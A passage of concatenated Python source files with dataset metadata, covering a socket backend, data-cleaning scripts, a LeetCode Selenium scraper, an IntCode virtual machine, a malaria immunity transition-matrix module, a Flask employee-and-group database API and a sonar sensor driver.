False\n\tdef error(self, e):\n\t\tif self.checklevel(4):\n\t\t\tself._writelog(\"ERROR\", e, 35)\n\t\t\tif self.raise_error:\n\t\t\t\traise e\n\t\t\treturn True\n\t\treturn False\n\tdef critical(self, e):\n\t\tif self.checklevel(0):\n\t\t\tself._writelog(\"CRITICAL\", e, 31)\n\t\t\traise e\n\t\t\treturn True\n\t\treturn False\n\nclass BaseBackend(object):\n\t\"\"\"\n\t\tBase class for socket backend.\n\t\tThis class provides:\n\t\t\t- some methods for tools.parsercommand.BaseParserCommand\n\t\t\t- an output queue for receve raw data\n\t\t\t- a mainloop for socket\n\t\t\t- inhiterable interface for parsing metadata\n\t\"\"\"\n\tdef __init__(self, addr, port, **kwargs):\n\t\tkwargs.setdefault(\"buffer_size\", 16892)\n\t\tkwargs.setdefault(\"verbose\", 0)\n\t\tkwargs.setdefault(\"allow_print\", False)\n\t\tkwargs.setdefault(\"raise_error\", False)\n\t\tsuper(BaseBackend, self).__init__()\n\t\tself.is_running=False\n\t\tself.addr=addr\n\t\tself.port=port\n\t\tself.buffer_size=kwargs.get(\"buffer_size\")\n\t\tself.sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.select=selectors.DefaultSelector()\n\t\tself.outqueue=Queue()\n\t\t# Verbosity\n\t\tverbose=kwargs[\"verbose\"]\n\t\tself.logger=BackendLogger(BackendLogger.level_encode(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcritical=verbose>0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmsg=verbose>0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tinfo=verbose>1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\twarning=verbose>2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\terror=verbose>3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tdebug=verbose>4,\n\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\tallow_print=kwargs[\"allow_print\"],\n\t\t\t\t\t\t\t\traise_error=kwargs[\"raise_error\"],\n\t\t)\n\tdef add_msg(self, msg):\n\t\tself.outqueue.put(msg)\n\t\tself.logger.msg(msg)\n\tdef close(self):\n\t\tself.is_running=False\n\t\tself.sock.close()\n\tdef socketloop(self):\n\t\tself.is_running=True\n\t\tself.logger.debug(\"start socketloop\")\n\t\twhile self.is_running:\n\t\t\tself.run()\n\t\tself.is_running=False\n\t\tself.logger.debug(\"end socketloop\")\n\tdef parse_metadata(self, peer, metadata):\n\t\tif len(metadata)==0:\n\t\t\treturn True\n\t\treturn False\n\tdef run(self):\n\t\traise NotImplementedError()\n\nclass Queue(object):\n\t\"\"\"\n\t\tQueue class:\n\t\t\tThis class provides a queue data structure\n\t\t\tIt also have a system for remove automatically the last element with a number of get call\n\t\"\"\"\n\t__slots__=(\"elements\", \"maxget\")\n\tdef __init__(self):\n\t\tsuper(Queue, self).__init__()\n\t\tself.elements=[]\n\t\tself.maxget=[]\n\tdef __len__(self):\n\t\treturn len(self.elements)\n\tdef put(self, element, max_get=None):\n\t\tself.maxget.append(None)\n\t\tself.elements.append(element)\n\tdef get(self):\n\t\tif not len(self.maxget):\n\t\t\treturn None\n\t\tif self.maxget[0]:\n\t\t\tself.maxget[0]-=1\n\t\t\tif self.maxget==0:\n\t\t\t\treturn self.elements.pop()\n\t\telif not self.elements:\n\t\t\treturn None\n\t\treturn self.elements[0]\n\tdef pop(self):\n\t\tif not len(self.maxget):\n\t\t\treturn None\n\t\tif not self.elements:\n\t\t\treturn None\n\t\tif self.maxget[0]:\n\t\t\tdel self.maxget[0]\n\t\t\treturn self.elements.pop()\n","sub_path":"backend/basebackend.py","file_name":"basebackend.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581210358","text":"# coding: utf-8\nimport os\nimport pandas as pd\nimport numpy as np\nimport json # to dump python dict\n\n\n# --- load manually checked replacement schemes for equivalent brand names ---\nfolder = './raw/'\nfname = 'brand_dist_1_v1_janzen.csv'\ndf_d1_v1 = pd.read_csv(os.path.join(folder, fname))\nfname = 'brand_dist_1_v1_glassy.csv'\ndf_d1_v2 = pd.read_csv(os.path.join(folder, fname), encoding='ISO-8859-1') # glassy's can't be opened with utf-8\n\n\n# --- get indices for different and same pairs ---\ndiff_idx = df_d1_v1[df_d1_v2['replacable'] != df_d1_v1['replacable']].index\nsame_idx = df_d1_v1[df_d1_v2['replacable'] == df_d1_v1['replacable']].index\nprint(\"num diff between two replace scheme:\", len(diff_idx))\n\n\n# --- get replaceable pairs agreed by both schemes ---\ndf_same = df_d1_v1.iloc[same_idx]\ndf_p1 = df_same[df_same['replaceable'] == 1]\ndict_p1 = {row['brand_B']: row['brand_A'] for i, row in df_p1.iterrows()} # generate dict\nprint(\"num tuples in v1 replace dict:\", len(dict_p1))\n\n\n# --- save part 1 replacement dictionary ---\nfolder = './checked/'\nfname = 'brand_d1_p1.dict'\nif not os.path.exists(folder):\n os.makedirs(folder)\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_p1, f, indent=2)\n\n\n# --- view diff pairs ---\nprint(df_d1_v1.iloc[diff_idx])\nprint(df_d1_v2.iloc[diff_idx])\n\n\n# --- load train data to inspect ---\nfolder = '../../data/raw/'\nfname = 'train.tsv'\ndf_train = pd.read_table(os.path.join(folder, fname))\nfname = 'test.tsv'\ndf_test = pd.read_table(os.path.join(folder, fname))\n\n\n# --- helper function to find subset of DataFrame with certain brand ---\ndef df_with_brand(df, bname):\n return df[df['brand_name'] == bname]\n\n\n# --- view brands ---\ndf_with_brand(df_train, 'Camilla') # only one is left here because I did the inspection in Jupyter Notebook\ndf_with_brand(df_test, 'Camilla') # only one is left here because I did the inspection in Jupyter Notebook\n\n\n# --- confirmed replacable pairs ---\np2_idx = [68, 86, 87, 95, 106, 156, 267, 277, 366, 378]\nspecial_brand_list = [\"Athelete\", \"MATRIX\", \"Elements\", \"Curve\"] # mislabelled brands found here\ndf_p2 = df_d1_v1.iloc[p2_idx]\ndict_p2 = {row['brand_B']: row['brand_A'] for _, row in df_p2.iterrows()} # generate dict\n\n\n# --- save part 2 replacement dictionary ---\nfolder = './checked/'\nfname = 'brand_d1_p2.dict'\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_p2, f, indent=2)\n\n\n# --- save mislabelled brands list ---\nfname = 'brand_mislabeled_p1..lst'\nwith open(os.path.join(folder, fname), 'w') as f:\n for val in special_brand_list:\n f.write(val + '\\n')\n\n\n# --- load manually checked replacement schemes for special characters ---\nfolder = './raw/'\nfname = 'char_v1.csv'\ndf_char_v1 = pd.read_csv(os.path.join(folder, fname))\ndf_char_v1['to_replace_with'] = df_char_v1['to_replace_with'].map(\n lambda x: x if len(x) == 1 else \" {} \".format(x.strip()) # if the string used to replace is a word, add spaces\n)\ndict_char = {row['character']: row['to_replace_with'] for _, row in df_char_v1.iterrows()} # generate dict\n\n\n# --- save replacement dictionary ---\nfolder = './checked'\nfname = 'char_v1.dict'\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_char, f, indent=2)\n\n\n# --- load manually checked fillable brand_name(A-K) from name ---\nfolder = './raw/'\nfname = 'brand_in_name_A_K.xlsx'\nws = pd.read_excel(os.path.join(folder, fname),\n sheet_name=\"results\", usecols=[\"index\", \"name\", \"replace\"],\n dtype={\"index\": np.int32, \"name\": str, \"replace\": np.int8}) # ws for worksheet\nws['name'] = ws['name'].map(lambda x: x.replace('.test.tsv', '').replace('@@slash@@', '/')) # correct error and decode\n\n\n# --- get replaceable, not replaceable and to-be-determined brands ---\nbin_no_repl = {} # to store brands; bin for \"brand in name\", repl for replaceable\nbin_repl = {}\nbin_empty = {}\nbin_no_repl[\"A_K\"] = ws[ws[\"replace\"] == 0][\"name\"].tolist()\nbin_repl[\"A_K\"] = ws[ws[\"replace\"] == 1][\"name\"].tolist()\nbin_empty[\"A_K\"] = ws[ws[\"replace\"] == 2][\"name\"].tolist()\n\n\n# ===== helper class =====\nclass FileSaver:\n def __init__(self, folder):\n self.folder = folder\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n def save_list(self, lst, fname):\n assert isinstance(lst, list), \"\\\"lst\\\" must be an instance of list\"\n with open(os.path.join(self.folder, fname + \".lst\"), 'w') as f:\n for v in lst:\n f.write(str(v) + '\\n')\n\n def save_dict(self, dic, fname, **kw):\n assert isinstance(dic, dict), \"\\\"dic\\\" must be an instance of dict\"\n kw.setdefault(\"indent\", 2)\n with open(os.path.join(folder, fname + \".dict\"), 'w') as f:\n json.dump(dic, f, **kw)\n\n\nfs = FileSaver('./checked/')\nfs.save_list(bin_no_repl[\"A_K\"], \"brand_in_name_norepl_A_K\")\nfs.save_list(bin_repl[\"A_K\"], \"brand_in_name_repl_A_K\")\nfs.save_list(bin_empty[\"A_K\"], \"brand_in_name_empty_A_K\")\n\n\nspecial_brand_list2 = []\nspecial_brand_list2.append(\"% Pure\")\n","sub_path":"code/prep/gen_replace_dict.py","file_name":"gen_replace_dict.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"33581497","text":"import requests\nfrom lxml import html\nimport tqdm, time, requests, json\nfrom lxml import etree\nfrom selenium import webdriver\n# from fake_useragent import UserAgent\nimport random, time\n\n## 初始化浏览器\nchromeOptions = webdriver.ChromeOptions()\n# userAgent = UserAgent()\n# if len(self.proxies) != 0:\n# print(\"Use old IP to fetch new IPs...\")\n# chromeOptions.add_argument(f\"--proxy-server={self.proxies}\")\n# chromeOptions.add_argument(random.choice(userAgent.data[\"browsers\"][random.choice(userAgent.data_randomize)]))\n# chromeOptions.add_argument('--headless') # use headless mode\ndriverSource = webdriver.Chrome(executable_path=r\"C:\\Users\\XMK23\\Downloads\\chromedriver.exe\",\n chrome_options=chromeOptions)\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\XMK23\\Downloads\\chromedriver.exe\",\n chrome_options=chromeOptions)\n\ndriverSource.get(\"https://leetcode-cn.com/problemset/lcof\") #\"https://leetcode-cn.com/problemset/lcof/#page-{}\".format(pageNum))\ntime.sleep(2)\n\n\n## 首先是按页码,一页一页来。\nwhile True:\n try:\n rendered_body = driverSource.page_source\n page_source = etree.HTML(rendered_body)\n ## 获取一页上所有的url\n titles = page_source.xpath('//div[@class=\"question-title\"]/a/text()')\n urls = page_source.xpath('//div[@class=\"question-title\"]/a/@href')\n ## 逐个url进行处理。\n counter = 0\n for title, url in tqdm.tqdm(zip(titles, urls)):\n fullUrl = \"https://leetcode-cn.com\" +url\n driver.get(fullUrl)\n time.sleep(1)\n rendered_body = driver.page_source\n page_source = etree.HTML(rendered_body)\n texts = page_source.xpath('//div[@class=\"notranslate\"]//text()')\n heheda = driver.find_element_by_xpath('//div[@class=\"notranslate\"]')\n ## 打印信息到文件里。\n pyFileName = heheda.parent.title.split(\".\")[0].replace(\"剑指\", \"Jianzhi\").replace(\" \", \"\")\n with open(pyFileName + \".py\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"'''\\n[{}]({})\\n\\n{}'''\\n\".format(heheda.parent.title, fullUrl, \"\".join(texts)))\n # break\n\n button = driverSource.find_element_by_xpath('//a[@class=\"reactable-next-page\"]')\n\n button.click()\n time.sleep(2)\n except:\n break\n\n\n## 最后会崩掉,但是没事的。","sub_path":"LeetcodeProblemCrawling/GeneratePyFilesWithProblem/GetProblems_JianzhiOffer.py","file_name":"GetProblems_JianzhiOffer.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3405790","text":"from tool.runners.python import SubmissionPy\n\n\nfrom copy import deepcopy\nfrom collections import defaultdict, deque\n\n\nclass IntCodeVM:\n VAL, PTR = 0, 1 # arg modes: value / pointer\n\n INSTRS = {\n 1: (\"plus\", (VAL, VAL, PTR)),\n 2: (\"mul\", (VAL, VAL, PTR)),\n 3: (\"input\", (PTR,)),\n 4: (\"output\", (VAL,)),\n 5: (\"jump_if_true\", (VAL, VAL)),\n 6: (\"jump_if_false\", (VAL, VAL)),\n 7: (\"less_than\", (VAL, VAL, PTR)),\n 8: (\"equals\", (VAL, VAL, PTR)),\n 9: (\"relative_base_incr\", (VAL,)),\n }\n\n def __init__(self, program):\n self.memory = defaultdict(int, {i: elem for i, elem in enumerate(program)})\n self.instr_ptr = 0\n self.relative_base = 0\n self.blocked_stdin = False\n self.stdin = deque()\n self.stdout = deque()\n\n def copy(self):\n return deepcopy(self)\n\n @property\n def stopped(self):\n return self.memory[self.instr_ptr] == 99\n\n def arg(self, n, arg_type, arg_mode):\n assert arg_type in [self.VAL, self.PTR]\n assert arg_mode in [0, 1, 2] if arg_type == self.VAL else [0, 2]\n\n if arg_mode == 0:\n ptr = self.memory[self.instr_ptr + 1 + n]\n elif arg_mode == 1:\n ptr = self.instr_ptr + 1 + n\n elif arg_mode == 2:\n ptr = self.memory[self.instr_ptr + 1 + n] + self.relative_base\n else:\n raise Exception(f\"Unknown arg mode: {mode}\")\n\n return ptr if arg_type == self.PTR else self.memory[ptr]\n\n @classmethod\n def parse_instr(cls, instr):\n opcode = instr % 100\n instr //= 100\n args_types = cls.INSTRS[opcode][1]\n modes = []\n\n for _ in range(len(args_types)):\n modes.append(instr % 10)\n instr //= 10\n\n return opcode, modes\n\n def run(self):\n while not self.stopped:\n opcode, modes = self.parse_instr(self.memory[self.instr_ptr])\n instr_name, arg_types = self.INSTRS[opcode]\n\n args = [\n self.arg(n, arg_type, arg_mode)\n for n, (arg_type, arg_mode) in enumerate(zip(arg_types, modes))\n ]\n\n getattr(self, f\"op_{instr_name}\")(args) # self.op_XXX(args)\n\n if self.blocked_stdin:\n return\n\n def op_plus(self, args):\n self.memory[args[2]] = args[0] + args[1]\n self.instr_ptr += len(args) + 1\n\n def op_mul(self, args):\n self.memory[args[2]] = args[0] * args[1]\n self.instr_ptr += len(args) + 1\n\n def op_input(self, args):\n if self.stdin:\n self.memory[args[0]] = self.stdin.popleft()\n self.instr_ptr += len(args) + 1\n self.blocked_stdin = False\n else:\n self.blocked_stdin = True\n\n def op_output(self, args):\n self.stdout.append(args[0])\n self.instr_ptr += len(args) + 1\n\n def op_jump_if_true(self, args):\n if args[0] != 0:\n self.instr_ptr = args[1]\n else:\n self.instr_ptr += len(args) + 1\n\n def op_jump_if_false(self, args):\n if args[0] == 0:\n self.instr_ptr = args[1]\n else:\n self.instr_ptr += len(args) + 1\n\n def op_less_than(self, args):\n self.memory[args[2]] = 1 if args[0] < args[1] else 0\n self.instr_ptr += len(args) + 1\n\n def op_equals(self, args):\n self.memory[args[2]] = 1 if args[0] == args[1] else 0\n self.instr_ptr += len(args) + 1\n\n def op_relative_base_incr(self, args):\n self.relative_base += args[0]\n self.instr_ptr += len(args) + 1\n\n\ndef solve_part2(program):\n n = 50\n vms = [IntCodeVM(program) for _ in range(50)]\n\n for i, vm in enumerate(vms):\n vm.stdin.append(i)\n\n X_nat, Y_nat = None, None # next values to be delivered by the NAT\n Y_delivered = None # last Y value delivered by the NAT\n\n while True:\n idle = True\n\n for i, vm in enumerate(vms):\n assert vm.stopped == False\n\n if vm.blocked_stdin and not vm.stdin:\n vm.stdin.append(-1)\n else:\n idle = False\n\n vm.run()\n assert len(vm.stdout) % 3 == 0\n\n if vm.stdout:\n idle = False\n\n while vm.stdout:\n dest, X, Y = (vm.stdout.popleft() for _ in range(3))\n if dest == 255:\n X_nat, Y_nat = X, Y\n else:\n vms[dest].stdin.extend([X, Y])\n\n if idle:\n if Y_delivered is not None and Y_delivered == Y_nat:\n return Y_delivered\n Y_delivered = Y_nat\n vms[0].stdin.extend([X_nat, Y_nat])\n\n\nclass FranciscoSubmission(SubmissionPy):\n def run(self, s):\n program = list(map(int, s.split(\",\")))\n return solve_part2(program)\n","sub_path":"day-23/part-2/francisco.py","file_name":"francisco.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"157959543","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport copy\n\n\ndef probability_shifting_module(TM, immune_stimulation_threshold,row_scale_factor,column_scale_factor):\n number_of_bin_edges = max([len(i) for i in TM])\n bin_numbers = np.arange(0, number_of_bin_edges)\n new_TM = copy.copy(TM)\n rows_to_cycle_through = np.arange(immune_stimulation_threshold, max(bin_numbers) + 1)\n # define a row scaling factor that represents the changing force of immunity across current density classes\n for row in rows_to_cycle_through:\n Old_column_values = [x for x in TM[row]]\n Bin_decreases = [np.log10(column_scale_factor * row_scale_factor * bin) for bin in bin_numbers]\n New_column_values = [Old_column_values[i] / Bin_decreases[i] for i in range(len(Old_column_values))]\n\n Net_zero_column_change = sum(\n [abs(New_column_values[j] - Old_column_values[j]) for j in np.arange(1, len(Old_column_values))])\n New_column_values[0] = Old_column_values[0] + Net_zero_column_change\n new_TM[row] = New_column_values\n\n return(TM,new_TM)\n\ndef set_transition_matrix(cb,TM,scale_factor,immune_stim_threshold = 1):\n old_TM, shifted_TM = probability_shifting_module(TM,immune_stim_threshold, row_scale_factor= scale_factor,column_scale_factor= scale_factor)\n cb.update_params({\"Parasite_Peak_Density_Probabilities\": shifted_TM,\n \".Scale_Factor\": scale_factor})\n\n return {\"scale_factor\": scale_factor}\n\ndef plot_heatmap_transition_changes(old_TM, new_TM):\n diffs =pd.DataFrame(np.zeros((len(old_TM), len(old_TM))))\n\n cmap = 'coolwarm'\n\n for row in range(len(old_TM)):\n for col in range(len(old_TM)):\n diffs[row][col] = old_TM[row][col] - new_TM[row][col]\n\n plt.imshow(diffs,cmap = cmap,vmin = -1, vmax = 1)\n plt.show()\n\nif __name__ == '__main__':\n TM = [\n [1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.373134328, 0.0, 0.358208955, 0.179104478, 0.074626866, 0.014925373, 0.0],\n [0.277108434, 0.0, 0.289156627, 0.301204819, 0.132530120, 0.0, 0.0],\n [0.042253521, 0.0, 0.126760563, 0.232394366, 0.542253521, 0.056338028, 0.0],\n [0.168421053, 0.0, 0.010526316, 0.126315789, 0.410526316, 0.284210526, 0.0],\n [0.176470588, 0.0, 0.058823529, 0.0, 0.235294118, 0.529411765, 0.0]\n ]\n TMpd = pd.DataFrame(TM)\n # What rows am I going to go about scaling? (Reminder... Row 0 transitions from truezero, and Row 6 is from highest density)\n immune_stim_threshold = 6\n # whats the base parameter I want to use to describe how immunity impacts these different density classes?\n row_scale_factor = 1\n # whats the base parameter I want to use to describe how immunity impacts the transitions within a density class?\n column_scale_factor = 1\n\n plt.imshow(-TMpd.T, cmap='coolwarm', vmin=-1, vmax=1)\n plt.show()\n def test_transition_matrix(scale_factor):\n old_TM, shifted_TM = probability_shifting_module(TM, 1, row_scale_factor=scale_factor,\n column_scale_factor=scale_factor)\n\n plot_heatmap_transition_changes(old_TM, shifted_TM)\n\n return (old_TM, shifted_TM)\n for scale_num in [2,5,10,100]:\n old_TM, shifted_TM = test_transition_matrix(scale_num)","sub_path":"examples/malariatherapy/immunity_transitions_configuration.py","file_name":"immunity_transitions_configuration.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"184319401","text":"import TwitterStreamFunctions as tsf\nfrom tweet import Tweet\nimport pandas as pd\n\n# data path of input file\n# remove ../ to run in console\ninputPath = \"../data/1000_raw_tweets.txt\"\n\nraw_tweet_data = open(inputPath, \"r\")\n\n# turn the raw file into tweet objects of desired data\nOrgList = tsf.organize_tweets(raw_tweet_data)\n\n# convert the tweet object into a dict for use in pandas\nListOfDicts = []\nfor item in OrgList:\n dict_holder = Tweet.asDict(item)\n ListOfDicts.append(dict_holder)\n\n# create dataframe of tweets\ndf = pd.DataFrame(ListOfDicts)\n\nname = tsf.prepareTable()\ntsf.loadIntoTable(name, ListOfDicts)\n\n\n\n\n\n\n# outputPath = \"../data/data_frame.txt\"\n# outFile = open(outputPath, \"w\")\n# pd.DataFrame.to_csv(df, outputPath)\n\n\n\n\n\n\n\n","sub_path":"scripts/UsingNewFunctions.py","file_name":"UsingNewFunctions.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"7756726","text":"from flask import Flask, request,jsonify\nfrom flask_restful import Resource, Api\nfrom database import *\nimport requests\napi = Api(app)\n\n# Operations On Employee\ndef insert_employee(name,email,pubKey):\n person = Employee.query.filter_by(name=name).filter_by(emailId=email).first()\n if person!=None:\n return False,\" The Employee Is Already Registered .\"\n new_emp=Employee(name,email,pubKey)\n db.session.add(new_emp)\n db.session.commit()\n person = Employee.query.filter_by(name=name).filter_by(emailId=email).filter_by(publicKey=pubKey).first()\n id=person.id\n print(\"1 Row Inserted\")\n return True,f\" The Employee Got Registered with Employee Id {id}.\"\n\ndef email_key(empId):\n person = Employee.query.filter_by(id=empId).first()\n if person==None:\n return False,\"No Employee with this employee Id exists.\"\n data=[]\n data.append(person.emailId)\n data.append(person.publicKey)\n return True,data\n\n#Operations On Groups and Members Of\ndef createGroup(name,admin,members):\n if len(members)==0:\n return False,\"Atleaset One Member Required in Group\"\n e=Employee.query.filter_by(id=admin).first()\n admin_name=e.name\n new_grp=Group(name,admin_name,len(members))\n db.session.add(new_grp)\n createdGrp=Group.query.filter_by(name=name).first()\n createdId=createdGrp.id\n members=list(set(members))\n for empId in members:\n new_grp=MemberOf(empId,createdId)\n db.session.add(new_grp)\n db.session.commit()\n return True,\"Success!! Group Created.\"\n\ndef viewGroup(name_):\n Grp=Group.query.filter_by(name=name_).first()\n if Grp==None:\n return False,\"Sorry!! No Such Group Exists.\"\n id=Grp.id\n members=MemberOf.query.filter_by(grpId=id).all()\n members_of_grp=\"\\nThe Members Of The Group Are\\n\"\n\n for emp in members:\n e=Employee.query.filter_by(id=emp.empId).first()\n name=e.name\n #print(name)\n members_of_grp=members_of_grp+name+\"\\n\"\n groupDetails=Grp\n return True,str(Grp)+members_of_grp,members\n\ndef deleteEmpId(empId):\n emp = Employee.query.get(empId)\n if emp==None:\n return False,\"No Employee with the requested EmployeeId exists in the database,or you already deleted the employee with requested EmployeeId.\"\n db.session.delete(emp)\n grps=MemberOf.query.filter_by(empId=empId).all()\n for grp in grps:\n grpId=gpr.id\n delMembership=MemberOf.query.filter_by(empId=empId).filter_by(grpId=grpId)\n db.session.delete(delMembership)\n decGrp= Group.query.get(grpId)\n decGrp.count=decGrp-1;\n if decGrp.count==0:\n db.session.delete(decGrp)\n else:\n db.session.add(decGrp)\n db.session.commit()\n return True,f\"Employee with EmployeeId {empId} got deleted\"\n\ndef deleteAll():\n emp = Employee.query.all()\n print(emp)\n if emp==[]:\n return False,\"No Employee Record to be deleted .\"\n db.session.query(Employee).delete()\n db.session.query(MemberOf).delete()\n db.session.query(Group).delete()\n db.session.commit()\n return True,\"All employees record got deleted\"\n\ndef returnAll():\n employees = db.session.query(Employee)\n emp_list=[]\n if employees==None:\n return False,\"No Employee Registered\"\n #names = db.session.query(Employee.name).all()\n ##pubKeys = db.session.query(Employee.publicKey).all()\n for emp in employees:\n curr_emp={'empId':emp.id,'name':emp.name,'email':emp.emailId}\n emp_list.append(curr_emp)\n return True,emp_list#,names,empIds,pubKeys\n\n\n\n\n\n############################################## APIS\n\n\nclass Insert(Resource):\n def post(self,name,email,dbaPass):\n pubKey=request.get_json()['Key']\n response=insert_employee(name,email,pubKey)\n message={'status':response[0],'reply':response[1]}\n return message, 200\n\nclass Query(Resource):\n def get(self,empId):\n response=email_key(empId)\n message={'status':response[0],'reply':response[1]}\n return message\n\n\nclass AllEmployee(Resource):\n def get(self):\n response=returnAll()\n return {'status':response[0],'reply':response[1]}\n\ngroup_name=\"\"\ngroup_admin=0\ngroup_members=[]\nclass CreateGroup(Resource):\n def post(self,name,admin):\n global group_name\n global group_admin\n global group_members\n adminExists=Employee.query.filter_by(id=admin).first()\n if adminExists==None:\n return {'status':'False','reply':\"You are not a registered employee. So You are not permitted to create the group\"}\n groupExists=Group.query.filter_by(name=name).first()\n if groupExists==True:\n return {'status':'False','reply':\"A group with requested name already exists\"}\n group_name=name\n group_admin=admin\n group_members.append(admin)\n message={'status':'True','reply':\"You Can Create the Group\"}\n return message\nclass AddMembers(Resource):\n def post(self,empId):\n global group_name\n global group_admin\n global group_member\n print(group_members)\n print(group_name+\" h \"+str(group_admin))\n empExists=Employee.query.filter_by(id=empId).first()\n if empExists==None:\n return {'status':False,'reply':f\"Employee Id {empId} is not a Valid Employee Id.Please Verify\"}\n group_members.append(empId)\n return {'status':True,'reply':\" Valid Employee Id \"}\nclass Create(Resource):\n def post(t=True):\n global group_name\n global group_admin\n global group_member\n response=createGroup(group_name,group_admin,group_members)\n group_members.clear()\n group_name=\"\"\n group_admin=0\n message={'status':response[0],'reply':response[1]}\n return message\n\nclass DeleteEmpId(Resource):\n def post(self,empId):\n response=deleteEmpId(empId)\n message={'status':response[0],'reply':response[1]}\n return message\n\nclass Delete(Resource):\n def get(self):\n response=deleteAll()\n message={'status':response[0],'reply':response[1]}\n print(message)\n return message\n\nclass View(Resource):\n def get(self,groupName):\n print(groupName)\n response=viewGroup(groupName)\n message={'status':response[0],'reply':response[1]}\n if response[0]:\n members=[]\n for m in response[2]:\n members.append(m.empId)\n message['members_ids']=members\n return message\n\napi.add_resource(Insert, '/insert///')\napi.add_resource(Query, '/email_and_key/')\napi.add_resource(CreateGroup, '/CreateGroup//')\napi.add_resource(AddMembers, '/AddMembers/')\napi.add_resource(Create, '/Submit')\napi.add_resource(View, '/viewgroup/')\napi.add_resource(DeleteEmpId, '/Delete/')\napi.add_resource(Delete, '/Delete')\napi.add_resource(AllEmployee,'/queryAll')\n\n\n@app.route('/')\ndef index():\n return \"

The Database is Running

\"\n\nif __name__ == '__main__':\n db.create_all()\n app.run(host=\"localhost\",port=8001,debug=True)\n","sub_path":"database/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"210004651","text":"import time\nclass Sensor:\n \"\"\"\n 表示连接到Donkey Car的距离测量传感器类。\n \"\"\"\n def __init__(self, pi, range_gpios):\n \"\"\"\n 初始化超声波传感器驱动器\n \"\"\"\n self.pi = pi\n if range_gpios is not None:\n from donkeycar.parts.Driver import Driver\n self.range = Driver(self.pi, range_gpios[0], range_gpios[1])\n else:\n self.range = None\n self.distance = None\n\n def update_loop_body(self):\n \"\"\"\n 获取测量距离,并将其存储在实例变量距离中\n \"\"\"\n self.distance = self.range.read()\n time.sleep(0.03)\n\n def update(self):\n \"\"\"\n 实现在另一个线程中执行的处理。\n       调用距离传感器类并定期将结果测量为实例变量distance并存储 \n \"\"\"\n if self.range is not None:\n while True:\n self.update_loop_body()\n else:\n return None\n \n def run_threaded(self):\n return self.distance\n \n def run(self):\n if self.range is not None:\n self.distance = self.range.read()\n return self.distance\n \n def shutdown(self):\n \"\"\"\n 关闭线程\n \"\"\"\n if self.range is not None:\n self.range.cancel()\n self.range = None\n self.distance = None\n","sub_path":"projects/donkeycar/donkeycar/parts/sonicrangesensor.py","file_name":"sonicrangesensor.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"523411404","text":"# x = 상 하\n# y = 좌 우\ndef dfs(x, y, n, m, graph):\n if x < 0 or y < 0 or x >= n or y >= m:\n return False\n\n if graph[x][y] == 0:\n graph[x][y] = 1\n\n dfs(x - 1, y, n, m, graph)\n dfs(x, y - 1, n, m, graph)\n dfs(x + 1, y, n, m, graph)\n dfs(x, y + 1, n, m, graph)\n return True\n\n return False\n\n\ndef feeze_drinks(n, m, graph):\n answer = 0\n\n for i in range(n):\n for j in range(m):\n print(i, j)\n if dfs(i, j, n, m, graph):\n answer += 1\n\n return answer\n\n\nif __name__ == '__main__':\n '''\n # n, m 입력\n # n = 4, m = 5\n n, m = map(int, input().split())\n '''\n\n '''\n #예제 1 예시\n 00110\n 00011\n 11111\n 00000\n '''\n\n '''\n graph = []\n for i in range(n):\n graph.append(list(map(int, input())))\n print(\"graph = \", graph)\n '''\n\n print(feeze_drinks(4, 5, [[0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1],\n [1, 1, 1, 1, 1],\n [0, 0, 0, 0, 0]]))\n","sub_path":"robin/python/part02/dfs_bfs/freeze_drinks.py","file_name":"freeze_drinks.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384911128","text":"import numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom numpy.core.fromnumeric import var\nfrom scipy import optimize\nfrom scipy import stats\nimport arviz as az\nimport pandas as pd\nimport jax.numpy as jnp\nimport jax.random as random\nimport numpyro\nimport numpyro.distributions as dist\nfrom numpyro.infer import MCMC, NUTS\nfrom numpyro.infer import Predictive\n\n\ndef get_mpsa_brca2_ikbkap_data():\n \"\"\"\n 1. Get data from the MPSA database (BRCA2/IKBKAP 2018).\n 2. Devide Psi = PSI/100\n 3. Returns the log(Psi)\n \"\"\"\n psi_df = pd.read_csv('psi_5ss_2018_brca2_ikbkap_smn1.gz')\n psi_df.dropna(inplace=True)\n cond = (psi_df['brca2_9nt'] > 0) & (psi_df['ikbkap_9nt']) > 0\n psi_df = psi_df[cond]\n 